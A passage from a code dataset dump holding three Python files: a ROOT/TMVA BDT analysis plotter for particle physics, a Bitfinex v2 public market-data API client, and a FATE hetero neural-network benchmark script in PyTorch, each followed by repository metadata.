file_handle.get_objects_by_pattern(\"[A-z]*__Signal\",\n \"dataset/Method_BDTG/BDTG\")\n 
background_hists = file_handle.get_objects_by_pattern(\"[A-z]*__Background\",\n \"dataset/Method_BDTG/BDTG\")\n variables_hists = classify()\n for variable_name, variable_hists in variables_hists.iteritems():\n plot_config = pc(name=\"{:s}_{:d}\".format(variable_name, self.file_handles.index(file_handle)),\n color=[ROOT.kRed, ROOT.kBlue],\n draw=\"Hist\",\n watermark=\"Internal\",\n normalise=True,\n ymax=0.2)\n canvas = PT.plot_histograms(variable_hists, plot_config)\n FM.decorate_canvas(canvas, plot_config)\n self.output_handle.register_object(canvas, tdir=\"train_variables\")\n\n def analyse_overtraining(self, file_handle):\n training_score_signal = file_handle.get_object_by_name(\"MVA_BDTG_Train_S\", \"dataset/Method_BDTG/BDTG\")\n training_score_background = file_handle.get_object_by_name(\"MVA_BDTG_Train_B\", \"dataset/Method_BDTG/BDTG\")\n eval_score_signal = file_handle.get_object_by_name(\"MVA_BDTG_S\", \"dataset/Method_BDTG/BDTG\")\n eval_score_background = file_handle.get_object_by_name(\"MVA_BDTG_B\", \"dataset/Method_BDTG/BDTG\")\n\n ymax = 1.6 * max([training_score_signal.GetMaximum(), training_score_background.GetMaximum(),\n eval_score_signal.GetMaximum(), eval_score_background.GetMaximum()])\n\n kolmogorov_signal = get_KS(training_score_signal, eval_score_signal)\n kolmogorov_background = get_KS(training_score_background, eval_score_background)\n plot_config = pc(name=\"overtrain_{:d}\".format(self.file_handles.index(file_handle)),\n color=ROOT.kRed,\n draw=\"Marker\",\n style=20,\n ymax=ymax,\n watermark=\"Internal\")\n canvas = PT.plot_obj(training_score_signal, plot_config)\n plot_config.style = 24\n PT.add_object_to_canvas(canvas, eval_score_signal, plot_config)\n plot_config.style = 20\n plot_config.color = ROOT.kBlue\n PT.add_object_to_canvas(canvas, training_score_background, plot_config)\n plot_config.style = 24\n PT.add_object_to_canvas(canvas, eval_score_background, plot_config)\n FM.decorate_canvas(canvas, plot_config)\n FT.add_text_to_canvas(canvas, \"KS (signal): {:.2f}\".format(kolmogorov_signal), pos={'x': 0.18, 'y': 0.9},\n color=ROOT.kRed)\n FT.add_text_to_canvas(canvas, \"KS (bkg): {:.2f}\".format(kolmogorov_background), pos={'x': 0.18, 'y': 0.85},\n color=ROOT.kBlue)\n labels = [\"signal (train)\", \"signal (eval)\", \"background (train)\", \"background (eval)\"]\n FT.add_legend_to_canvas(canvas, labels=labels, xl=0.18, xh=0.3, yl=0.6, yh=0.82)\n self.output_handle.register_object(canvas, tdir=\"overtrain\")\n\n def perform_correlation_analysis(self):\n for file_handle in self.file_handles:\n self.analyse_correlations(file_handle)\n\n def analyse_correlations(self, file_handle):\n index = self.file_handles.index(file_handle)\n linear_corr_coeff_signal = file_handle.get_object_by_name(\"CorrelationMatrixS\", \"dataset\")\n linear_corr_coeff_background = file_handle.get_object_by_name(\"CorrelationMatrixB\", \"dataset\")\n plot_config = pc(name=\"linear_corr_coeff_signal_{:d}\".format(index), title=\"signal\", dist=None,\n draw_option=\"COLZTEXT\", ytitle=\"\", ztitle=\"lin. 
correlation [%]\")\n canvas_corr_coeff_signal = PT.plot_obj(linear_corr_coeff_signal, plot_config)\n plot_config.title = \"background\"\n plot_config.name = plot_config.name.replace(\"signal\", \"background\")\n canvas_corr_coeff_background = PT.plot_obj(linear_corr_coeff_background, plot_config)\n self.output_handle.register_object(canvas_corr_coeff_signal)\n self.output_handle.register_object(canvas_corr_coeff_background)\n correlation_hists_signal = file_handle.get_objects_by_pattern(\"scat_.*_Signal_Id\",\n \"dataset/InputVariables_Id/CorrelationPlots\")\n correlation_hists_background = file_handle.get_objects_by_pattern(\"scat_.*_Background_Id\",\n \"dataset/InputVariables_Id/CorrelationPlots\")\n plot_config_corr = pc(name=\"correlation_hist\", dist=None, draw_option=\"COLZ\", watermark=\"Internal\")\n for hist in correlation_hists_signal:\n variable_info = hist.GetName().split(\"_\")[1:-2]\n plot_config_corr.name = \"corr_\" + \"_\".join(variable_info) + \"_signal_{:d}\".format(index)\n split_index = variable_info.index(\"vs\")\n variable_x = \"_\".join(variable_info[:split_index])\n variable_y = \"_\".join(variable_info[split_index + 1:])\n plot_config_corr.xtitle = variable_x\n plot_config_corr.ytitle = variable_y\n plot_config_corr.ztitle = \"Entries\"\n canvas = PT.plot_obj(hist, plot_config_corr)\n FM.decorate_canvas(canvas, plot_config_corr)\n self.output_handle.register_object(canvas)\n for hist in correlation_hists_background:\n plot_config_corr.name = \"corr_\" + \"_\".join(hist.GetName().split(\"_\")[1:-2]) + \"_background_{:d}\".format(\n index)\n canvas = PT.plot_obj(hist, plot_config_corr)\n FM.decorate_canvas(canvas, plot_config_corr)\n self.output_handle.register_object(canvas)\n\n def analyse_roc_curves(self):\n for file_handle in self.file_handles:\n self.plot_roc_curves(file_handle)\n\n def plot_roc_curves(self, file_handle):\n def make_plot(dist, pc):\n roc_eff = file_handle.get_objects_by_pattern(dist, \"dataset/Method_BDTG/BDTG\")\n canvas = PT.plot_histograms(roc_eff, pc)\n FM.decorate_canvas(canvas, pc)\n self.output_handle.register_object(canvas, tdir=\"performance\")\n\n index = self.file_handles.index(file_handle)\n pc_roc_eff = pc(name=\"roc_eff_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\",\n ytitle=\"Background efficiency\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_effBvsS\", pc_roc_eff)\n pc_roc_inveff = pc(name=\"roc_inveff_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\", logy=True,\n ytitle=\"Inverse Background efficiency\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_invBeffvsSeff\", pc_roc_inveff)\n pc_roc_rejeff = pc(name=\"roc_rej_vs_eff_{:d}\".format(index), dist=None, draw_option=\"Line\",\n ytitle=\"Background rejection\", xtitle=\"Signal efficiency\")\n make_plot(\"MVA_BDTG_rejBvsS\", pc_roc_rejeff)\n\n def fit_score(self):\n bdt_score = ROOT.RooRealVar(self.branch_name, \"BDT score\", -0.9, 1.)\n chain = ROOT.TChain(\"Nominal/\" + self.tree_name)\n for file_handle in self.file_handles[1:]:\n chain.Add(file_handle.file_name)\n p0 = ROOT.RooRealVar(\"p0\", \"p0\", 1, -10., 10.)\n p1 = ROOT.RooRealVar(\"p1\", \"p1\", 1, -10., 10.)\n p2 = ROOT.RooRealVar(\"p2\", \"p2\", 1, -100., 100.)\n p3 = ROOT.RooRealVar(\"p3\", \"p3\", 1, -10., 10.)\n p4 = ROOT.RooRealVar(\"p4\", \"p4\", 1, -10., 10.)\n norm = ROOT.RooRealVar(\"norm\", \"norm\", chain.GetEntries(), 0., chain.GetEntries() * 2)\n mass = ROOT.RooRealVar(\"object_m\", \"object_m\", 0., 100000.)\n genpdf = ROOT.RooGenericPdf(\"genpdf\", 
\"genpdf\",\n \"norm * (p0 + p1 * exp(({:s} + 1.) *p2) + \"\n \"p3 * abs({:s})^(({:s} + 1.)*p4))\".format(self.branch_name, self.branch_name,\n self.branch_name),\n ROOT.RooArgList(bdt_score, p0, p1, p2, p3, p4, norm))\n data = ROOT.RooDataSet(\"data\", \"BDT_170526\", chain, ROOT.RooArgSet(bdt_score, mass),\n \"object_m/1000. < 1713. || object_m/1000. > 1841.\")\n frame = bdt_score.frame()\n data.plotOn(frame, ROOT.RooFit.Name(\"data\"), ROOT.RooFit.Binning(25))\n fit_result = genpdf.fitTo(data, ROOT.RooFit.Save())\n canvas = ROOT.TCanvas(\"c\", \"c\", 800, 600)\n canvas.cd()\n genpdf.plotOn(frame, ROOT.RooFit.Name(\"model\"))\n PT.add_fit_to_canvas(canvas, fit_result, genpdf, frame)\n FM.add_atlas_label(canvas, \"Internal\")\n frame.Draw()\n canvas.Modified()\n self.output_handle.register_object(canvas)\n self.output_handle.write_and_close()\n", "repo_name": "morgenst/PyAnalysisTools", "sub_path": "PyAnalysisTools/AnalysisTools/BDTAnalyser.py", "file_name": "BDTAnalyser.py", "file_ext": "py", "file_size_in_byte": 12900, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyAnalysisTools.AnalysisTools.MLHelper.MLTrainConfig", "line_number": 29, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 29, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 29, "usage_type": "name"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 30, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 30, "usage_type": "name"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader.read_yaml", "line_number": 34, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.YAMLHandle.YAMLLoader", "line_number": 34, "usage_type": "name"}, {"api_name": "PyAnalysisTools.AnalysisTools.MLHelper.TrainingReader", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.ensemble.AdaBoostClassifier", "line_number": 50, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 55, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.InvalidInputError", "line_number": 61, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.FileHandle.FileHandle", "line_number": 63, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.OutputHandle.OutputFileHandle", "line_number": 64, "usage_type": "call"}, {"api_name": "ROOT.gROOT.SetBatch", "line_number": 68, "usage_type": "call"}, {"api_name": "ROOT.gROOT", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 103, "usage_type": "call"}, {"api_name": "ROOT.kRed", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ROOT.kBlue", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_histograms", "line_number": 109, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 109, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 110, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 110, "usage_type": "name"}, {"api_name": "PyAnalysisTools.AnalysisTools.StatisticsTools.get_KS", "line_number": 122, "usage_type": "call"}, {"api_name": "PyAnalysisTools.AnalysisTools.StatisticsTools.get_KS", "line_number": 123, "usage_type": 
"call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 124, "usage_type": "call"}, {"api_name": "ROOT.kRed", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 130, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 130, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 132, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 132, "usage_type": "name"}, {"api_name": "ROOT.kBlue", "line_number": 134, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 135, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 135, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_object_to_canvas", "line_number": 137, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 137, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 138, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 138, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_text_to_canvas", "line_number": 139, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 139, "usage_type": "name"}, {"api_name": "ROOT.kRed", "line_number": 140, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_text_to_canvas", "line_number": 141, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 141, "usage_type": "name"}, {"api_name": "ROOT.kBlue", "line_number": 142, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_legend_to_canvas", "line_number": 144, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 144, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 155, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 157, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 157, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 160, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 160, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 167, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 177, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 177, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 178, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 178, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_obj", "line_number": 183, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 183, "usage_type": "name"}, {"api_name": 
"PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 184, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 184, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.plot_histograms", "line_number": 194, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 194, "usage_type": "argument"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 194, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.decorate_canvas", "line_number": 195, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 195, "usage_type": "argument"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 195, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 199, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 202, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlotConfig.PlotConfig", "line_number": 205, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 210, "usage_type": "call"}, {"api_name": "ROOT.TChain", "line_number": 211, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 214, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 215, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 216, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 217, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 218, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 219, "usage_type": "call"}, {"api_name": "ROOT.RooRealVar", "line_number": 220, "usage_type": "call"}, {"api_name": "ROOT.RooGenericPdf", "line_number": 221, "usage_type": "call"}, {"api_name": "ROOT.RooArgList", "line_number": 225, "usage_type": "call"}, {"api_name": "ROOT.RooDataSet", "line_number": 226, "usage_type": "call"}, {"api_name": "ROOT.RooArgSet", "line_number": 226, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Name", "line_number": 229, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 229, "usage_type": "attribute"}, {"api_name": "ROOT.RooFit.Binning", "line_number": 229, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Save", "line_number": 230, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 230, "usage_type": "attribute"}, {"api_name": "ROOT.TCanvas", "line_number": 231, "usage_type": "call"}, {"api_name": "ROOT.RooFit.Name", "line_number": 233, "usage_type": "call"}, {"api_name": "ROOT.RooFit", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools.add_fit_to_canvas", "line_number": 234, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.PlottingTools", "line_number": 234, "usage_type": "name"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting.add_atlas_label", "line_number": 235, "usage_type": "call"}, {"api_name": "PyAnalysisTools.PlottingUtils.Formatting", "line_number": 235, "usage_type": "name"}]}
+{"seq_id": "28897294104", "text": "from datetime import datetime\n# local\nfrom . import constants_v2 as _c\nfrom . import models_v2 as _m\nfrom ..base import Client\nfrom .server import BitfinexServerV2 as Server\n\n_p = _c.Path\n\n\nclass BitfinexPublic(Client):\n def __init__(self, timeout=30):\n Client.__init__(self, Server(), timeout)\n\n def ticker(self, symbol: _c.Symbol = _c.Symbol.BTCUSD):\n symbol = _c.Symbol.check(symbol).value\n url = self.url_for(_p.TICKER, path_arg=symbol)\n data = self.get(url)\n return _m.TradingTicker.create_from_json(data)\n\n def tickers(self, symbols: list):\n symbols = [_c.Symbol.check(symbol).value for symbol in symbols]\n parameters = {\n 'symbols': symbols,\n }\n url = self.url_for(_p.TICKERS)\n data = self.get(url, params=parameters)\n return {ticker[0]: _m.TradingTicker.create_from_json(ticker[1:])\n for ticker in data}\n\n def trades(self,\n symbol: _c.Symbol = _c.Symbol.BTCUSD,\n limit=None,\n start=None,\n end=None,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n if isinstance(start, datetime):\n start = start.timestamp() * 1000\n if isinstance(end, datetime):\n end = end.timestamp() * 1000\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'limit': limit,\n 'start': start,\n 'end': end,\n 'sort': sort,\n }\n url = self.url_for(_p.TRADES, path_arg=symbol)\n data = self.get(url, params=parameters)\n return [_m.TradingTrade.create_from_json(trade)\n for trade in data]\n\n def books(self,\n symbol: _c.Symbol,\n precision: _c.BookPrecision,\n length=None):\n symbol = _c.Symbol.check(symbol).value\n precision = _c.BookPrecision.check(precision).value\n parameters = {\n 'len': length,\n }\n path_arg = '{0}/{1}'.format(symbol, precision)\n url = self.url_for(_p.BOOKS, path_arg=path_arg)\n data = self.get(url, params=parameters)\n return [_m.TradingBook.create_from_json(book)\n for book in data]\n\n def stats(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n section: str,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n assert key in ['funding.size', 'credits.size', 'credits.size.sym', 'pos.size']\n assert size in ['1m']\n assert side in ['long', 'short']\n assert section in ['last', 'hist']\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'sort': sort,\n }\n path_arg = '{0}:{1}:{2}:{3}/{4}'.format(key, size, symbol, side, section)\n url = self.url_for(_p.STATS, path_arg=path_arg)\n data = self.get(url, params=parameters)\n if section == 'last':\n return _m.Stat.create_from_json(data)\n else:\n return [_m.Stat.create_from_json(stat)\n for stat in data]\n\n def stats_last(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n sort=None):\n return self.stats(symbol, key, size, side, 'last', sort)\n\n def stats_hist(self,\n symbol: _c.Symbol,\n key: str,\n size: str,\n side: str,\n sort=None):\n return self.stats(symbol, key, size, side, 'hist', sort)\n\n def candles(self,\n symbol: _c.Symbol,\n section: str,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n symbol = _c.Symbol.check(symbol).value\n assert time_frame in ['1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1D', '7D', '14D', '1M']\n assert section in ['last', 'hist']\n if isinstance(start, datetime):\n start = start.timestamp() * 1000\n if isinstance(end, datetime):\n end = end.timestamp() * 1000\n if sort:\n sort = 1 if sort is True else -1\n parameters = {\n 'limit': limit,\n 'start': start,\n 'end': end,\n 'sort': sort,\n }\n path_arg = '{0}:{1}/{2}'.format(time_frame, symbol, section)\n 
url = self.url_for(_p.CANDLES, path_arg=path_arg)\n data = self.get(url, params=parameters)\n if section == 'last':\n return _m.Candle.create_from_json(data)\n else:\n return [_m.Candle.create_from_json(candle)\n for candle in data]\n\n def candles_last(self,\n symbol: _c.Symbol,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n return self.candles(symbol, 'last', time_frame, limit, start, end, sort)\n\n def candles_hist(self,\n symbol: _c.Symbol,\n time_frame: str,\n limit=None,\n start=None,\n end=None,\n sort=None):\n return self.candles(symbol, 'hist', time_frame, limit, start, end, sort)\n", "repo_name": "mglcampos/trader", "sub_path": "htr/helpers/wrappers/bitfinex/client_public_v2.py", "file_name": "client_public_v2.py", "file_ext": "py", "file_size_in_byte": 5460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Client", "line_number": 11, "usage_type": "name"}, {"api_name": "base.Client.__init__", "line_number": 13, "usage_type": "call"}, {"api_name": "base.Client", "line_number": 13, "usage_type": "name"}, {"api_name": "server.BitfinexServerV2", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 123, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "argument"}]}
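The Bitfinex v2 client above repeats two small normalisations in every endpoint: datetime bounds become millisecond epochs and the sort flag becomes 1 or -1. Pulled out as one helper, as an editorial sketch (the boolean handling is simplified relative to the record's "sort is True" check):

from datetime import datetime, timezone

def to_api_params(start=None, end=None, sort=None, limit=None):
    def ms(t):
        # Bitfinex v2 expects millisecond epoch timestamps.
        return int(t.timestamp() * 1000) if isinstance(t, datetime) else t
    return {
        "start": ms(start),
        "end": ms(end),
        "sort": (1 if sort else -1) if sort is not None else None,
        "limit": limit,
    }

params = to_api_params(start=datetime(2023, 1, 1, tzinfo=timezone.utc), sort=True)
assert params["start"] == 1672531200000 and params["sort"] == 1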
+{"seq_id": "26895681135", "text": "import argparse\nimport numpy as np\nimport os\nfrom tensorflow import keras\nimport pandas\nimport tensorflow as tf\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras import optimizers\nfrom sklearn import metrics\nfrom pipeline.utils.tools import JobConfig\nfrom sklearn.preprocessing import LabelEncoder\n\nimport torch as t\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader\nimport tqdm\nfrom pipeline import fate_torch_hook\nfate_torch_hook(t)\n\n\nclass TestModel(t.nn.Module):\n\n def __init__(self, guest_input_shape, host_input_shape):\n super(TestModel, self).__init__()\n\n self.guest_bottom = t.nn.Sequential(\n nn.Linear(guest_input_shape, 10, True),\n nn.ReLU(),\n nn.Linear(10, 8, True),\n nn.ReLU()\n )\n\n self.host_bottom = t.nn.Sequential(\n nn.Linear(host_input_shape, 10, True),\n nn.ReLU(),\n nn.Linear(10, 8, True),\n nn.ReLU()\n )\n\n self.inter_a, self.inter_b = t.nn.Linear(8, 4, True), t.nn.Linear(8, 4, True)\n\n self.top_model_guest = t.nn.Sequential(\n nn.Linear(4, 1, True),\n nn.Sigmoid()\n )\n\n def forward(self, data):\n x_guest, x_host = data[0].type(t.float), data[1].type(t.float)\n guest_fw = self.inter_a(self.guest_bottom(x_guest))\n host_fw = self.inter_b(self.host_bottom(x_host))\n out = self.top_model_guest(guest_fw + host_fw)\n return out\n\n def predict(self, data):\n rs = self.forward(data)\n return rs.detach().numpy()\n\n\nclass TestDataset(Dataset):\n\n def __init__(self, guest_data, host_data, label):\n super(TestDataset, self).__init__()\n self.g = guest_data\n self.h = host_data\n self.l = label\n\n def __getitem__(self, idx):\n return self.g[idx], self.h[idx], self.l[idx]\n\n def __len__(self):\n return len(self.l)\n\n\ndef build(param, shape1, shape2):\n return TestModel(shape1, shape2)\n\n\ndef main(config=\"./config.yaml\", param=\"./hetero_nn_breast_config.yaml\"):\n\n try:\n if isinstance(config, str):\n config = JobConfig.load_from_file(config)\n data_base_dir = config[\"data_base_dir\"]\n else:\n data_base_dir = config.data_base_dir\n if isinstance(param, str):\n param = JobConfig.load_from_file(param)\n data_guest = param[\"data_guest\"]\n data_host = param[\"data_host\"]\n idx = param[\"idx\"]\n label_name = param[\"label_name\"]\n # prepare data\n Xb = pandas.read_csv(os.path.join(data_base_dir, data_guest), index_col=idx)\n Xa = pandas.read_csv(os.path.join(data_base_dir, data_host), index_col=idx)\n y = Xb[label_name]\n out = Xa.drop(Xb.index)\n Xa = Xa.drop(out.index)\n Xb = Xb.drop(label_name, axis=1)\n # torch model\n model = build(param, Xb.shape[1], Xa.shape[1])\n Xb = t.Tensor(Xb.values)\n Xa = t.Tensor(Xa.values)\n y = t.Tensor(y.values)\n dataset = TestDataset(Xb, Xa, y)\n batch_size = len(dataset) if param['batch_size'] == -1 else param['batch_size']\n dataloader = DataLoader(dataset, batch_size=batch_size)\n optimizer = t.optim.Adam(lr=param['learning_rate']).to_torch_instance(model.parameters())\n\n if param['eval_type'] == 'binary':\n loss_fn = t.nn.BCELoss()\n\n for i in tqdm.tqdm(range(param['epochs'])):\n\n for gd, hd, label in dataloader:\n optimizer.zero_grad()\n pred = model([gd, hd])\n loss = loss_fn(pred.flatten(), label.type(t.float32))\n loss.backward()\n optimizer.step()\n\n eval_result = {}\n for metric in param[\"metrics\"]:\n if metric.lower() == \"auc\":\n predict_y = model.predict([Xb, Xa])\n auc = metrics.roc_auc_score(y, predict_y)\n eval_result[\"auc\"] = auc\n elif metric == \"accuracy\":\n predict_y = np.argmax(model.predict([Xb, 
Xa]), axis=1)\n predict_y = label_encoder.inverse_transform(predict_y)\n acc = metrics.accuracy_score(y_true=labels, y_pred=predict_y)\n eval_result[\"accuracy\"] = acc\n\n data_summary = {}\n except Exception as e:\n print(e)\n return data_summary, eval_result\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\"BENCHMARK-QUALITY SKLEARN JOB\")\n parser.add_argument(\"-config\", type=str,\n help=\"config file\")\n parser.add_argument(\"-param\", type=str,\n help=\"config file for params\")\n args = parser.parse_args()\n if args.config is not None:\n main(args.config, args.param)\n else:\n main()\n", "repo_name": "FederatedAI/FATE", "sub_path": "examples/benchmark_quality/hetero_nn_pytorch/local-hetero_nn.py", "file_name": "local-hetero_nn.py", "file_ext": "py", "file_size_in_byte": 4792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5296, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pipeline.fate_torch_hook", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.float", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 59, "usage_type": "name"}, {"api_name": "pipeline.utils.tools.JobConfig.load_from_file", "line_number": 82, "usage_type": "call"}, {"api_name": "pipeline.utils.tools.JobConfig", "line_number": 82, "usage_type": "name"}, {"api_name": "pipeline.utils.tools.JobConfig.load_from_file", "line_number": 87, 